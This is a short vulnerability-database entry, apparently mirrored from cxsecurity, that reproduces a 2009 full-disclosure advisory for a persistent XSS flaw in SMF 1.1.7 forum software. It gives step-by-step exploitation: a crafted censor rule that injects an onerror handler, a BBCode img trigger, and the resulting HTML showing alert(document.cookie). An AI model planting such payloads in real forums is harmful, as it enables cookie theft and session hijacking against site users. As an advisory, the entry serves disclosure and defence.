SMF 1.1.7 Persistent XSS (requires permision to edit censor)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052228 漏洞类型
发布时间 2009-02-04 更新时间 2009-02-04
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2009020005
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
SMF 1.1.7 (simplemachines.org) XSS

Exploitation:

If you can modify the censor on a SMF forum, then you can make it
execute arbitrary JS code.
http://SMF.Forum.com/index.php?action=postsettings;sa=censor

Just add the following entry:
http://www.test.xss/ => http://www.test-xss/" onerror="alert(document.cookie)

And then write a post, modify your signature, or send a PM with the code:
[img]http://www.test.xss/[/img]

And the HTML code generated will be..
<img src="http://www.test-xss/" onerror="alert(document.cookie)"
alt="" border="0" />

Notes:
 - SMF is not using httpOnly cookies.
 - I'm going full disclosure with this because I've had bad
experiences with the SMF team when reporting vulnerabilities..

Greetings!!
-- Eduardo
http://www.sirdarckcat.net/